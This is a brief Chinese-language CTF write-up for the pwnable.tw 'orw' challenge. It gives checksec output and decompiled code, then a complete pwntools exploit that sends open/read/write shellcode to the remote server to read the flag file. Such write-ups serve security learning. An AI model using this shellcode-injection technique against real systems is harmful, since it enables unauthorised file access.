题目提示: Read the flag from /home/orw/flag
.
Only open
read
write
syscall are allowed to use.
checksec:
[*] '/home/kkkk/code/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
看一下伪代码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}
读取0xc8个字节, 然后转换为函数指针执行
这道题只需要构建一个open
read
write
的shellcode就可以了
可以用pwntools自动完成
from pwn import *
context(os="linux", arch="i386", log_level="debug")
r = remote("chall.pwnable.tw", 10001)
payload = shellcraft.open("/home/orw/flag")
payload += shellcraft.read("eax", "esp", 0x80)
payload += shellcraft.write(1, "esp", 0x80)
r.sendafter(b"Give my your shellcode:", asm(payload))
r.interactive()